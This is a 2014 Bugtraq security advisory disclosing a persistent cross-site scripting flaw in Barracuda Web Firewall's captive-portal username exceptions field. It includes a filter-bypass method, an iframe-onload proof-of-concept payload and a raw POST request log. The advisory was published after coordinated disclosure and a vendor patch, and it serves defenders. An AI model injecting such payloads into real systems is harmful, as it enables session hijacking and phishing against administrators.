[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Barracuda Networks Bug Bounty #31 Firewall - Persistent Access Policy Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-02-26 11:26:39
Message-ID: 530DCF6F.5070806 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Barracuda Networks Bug Bounty #31 Firewall - Persistent Access Policy Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1070
Barracuda Networks Security ID (BNSEC): BNSEC-2068
Release Date:
=============
2014-02-25
Vulnerability Laboratory ID (VL-ID):
====================================
1070
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by \
providing powerful network security, granular layer 7 application controls, user \
awareness and secure VPN connectivity combined with cloud-based malware protection, \
content filtering and reporting. It alleviates the performance bottlenecks in \
Unified Threat Management (UTM) appliances through intelligent integration of \
on-premise and cloud-based technologies. While the powerful on-premises appliance is \
optimized for tasks like packet forwarding and routing, Intrusion Prevention (IPS), \
DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like virus \
scanning, content filtering and usage reporting benefit from the scalable \
performance and elasticity of the cloud.
(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability \
in the official Barracuda Networks Web Firewall appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-09-04: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-09-06: Vendor Notification (Barracuda Networks Security Team - Bug Bounty \
Program)
2013-10-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty \
Program)
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric \
****** ]
2014-02-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official \
Barracuda Networks Web Firewall appliance web-application. The web vulnerability \
allows remote attackers or local low privileged application user accounts to inject \
(persistent) own malicious script codes on the application-side of the vulnerable \
online-service module.
The vulnerability is located in the `Firewall > Captive Portal > Basic Configuration` \
and the vulnerable input field is `username` under the `User Access Policy \
Exceptions`. Remote attackers are able to inject custom malicious script codes via \
the `Username` input field. The attack vector is persistent and the injection \
request method is POST.
To bypass the filter and to be able to save the injected payload into the \
application, the attacker needs to create 2 entries. First entry should be the \
attackers payload and second entry should be any dummy account userid. The \
application only performs validation on the active field which is freshly added and \
ignores the earlier entries thus allowing successful injection of the script code \
into the application interface.
The security risk of the persistent validation vulnerability is estimated as high \
with a cvss (common vulnerability scoring system) count of 3.5(+)|(-)3.6. \
Exploitation of the persistent input validation vulnerability requires a low \
privileged application user account and low user interaction. Successful \
exploitation results in session hijacking, persistent phishing, persistent external \
redirects & persistent manipulation of affected or connected module context.
Vulnerable Application(s):
[+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
Vulnerable Module(s):
[+] Firewall > Captive Portal > Basic Configuration > User Access Policy \
Exceptions
Vulnerable Parameter(s):
[+] username
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote \
attackers with low privileged web-application user account and low user interaction. \
For security demonstration or to reproduce the remote vulnerability follow the \
provided information and steps below.
Manual steps to reproduce the vulnerability:
1. Login with the user account to the barracuda networks web firewall appliance \
application 2. Goto Firewall > Captive Portal > Basic Configuration > User Access \
Policy Exceptions 3. Inject the following Payload and click the + button to add.
ateeq%20"><iframe onload=prompt(/PoC/) src=x></iframe>
4. You should now be able to see a javascript popup proving the existence of this \
vulnerability. 5. Add another entry a dummy username. This bypass the input filter \
and you wont get a warning while trying to SAVE the modification in the application.
POC:
<td valign="top"><table class="config_module" frame="box" id="policy_exceptions" \
rules="none" style="border:none;" summary="Box" cellpadding="0" \
cellspacing="0"><tbody><tr><td><input id="username" autocomplete="off" \
class="authen_cp" name="username" type="text"></td> <td width="22"><input \
class="new_button authen_cp" id="+" name="+" onclick="add_exception()" value="+" \
type="button"></td></tr> <tr class="pattern"><td>"><[PERSISTENT INJECTED SCRIPT \
CODE!]></td><td><input class="new_button" value="-" name="0" type="button"> \
</td></tr></tbody></table></td>
--- PoC Session Request Logs [POST] ---
POST /cgi-mod/index.cgi HTTP/1.1
Host: firewall.ptest.localhost:7228
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://firewall.ptest.localhost:7228/cgi-mod/index.cgi?auth_type=Local&et=13 \
78377089&locale=en_US&password=e7657221263938518ad85296817f1f3a&user=guest&primary_tab=FIREWALL&secondary_tab=authen_cp
Content-Length: 606
Cookie: ys-fw_custom_user_objects5=o%3Acolumns%3Da%253Ao%25253Aid%25253Dn%2525253A1%25255Ewidth%25253Dn%2525253A150%25255Ehidden%25
253Db%2525253A1%255Eo%25253Aid%25253Dn%2525253A2%25255Ewidth%25253Dn%2525253A150%255Eo%25253Aid%25253Dn%2525253A3%25255Ewidth%2525
3Dn%2525253A250%255Eo%25253Aid%25253Dn%2525253A4%25255Ewidth%25253Dn%2525253A200%255Eo%25253Aid%25253Dn%2525253A5%25255Ewidth%25253
Dn%2525253A50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
auth_type=Local&et=1378377108&password=33abcd72cc73fde950b3437920747e95&primary_tab=FIREWALL&realm=&secondary_tab=authen_cp&user=guest&role=
&locale=en_US&q=&UPDATE_authen_cp_usernames=ateeq%20%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe%3E&
UPDATE_authen_cp_user_auth=MSAD&UPDATE_authen_cp_user_access_policy=allow_all&username=%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe
%3E&UPDATE_authen_cp_auto_logout=30&UPDATE_authen_cp_auto_renewal=5&UPDATE_authen_cp_encryption=strong&UPDATE_authen_cp_signed_cert=
default&ajax_action=check_param_ajax_full&save=Save%20Changes
Response Headers:
HTTP/1.1 200 OK
Server: BarracudaFirewallHTTP 4.0
Date: Thu, 05 Sep 2013 10:12:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 2
Reference(s):
https://firewall.ptest.localhost:7228/cgi-mod/index.cgi?auth_type=Local&et=1378374620& \
locale=en_US&password=71109464bdb6adb668cf1e8c29392af0&user=guest&primary_tab=FIREWALL&secondary_tab=authen_cp
https://firewall.ptest.localhost:7228/cgi-mod/index.cgi
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the username input field. \
Validate all entries inserted in the input field to prevent further executions of \
the same vulnerability.
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric \
****** ]
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities is estimated \
as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic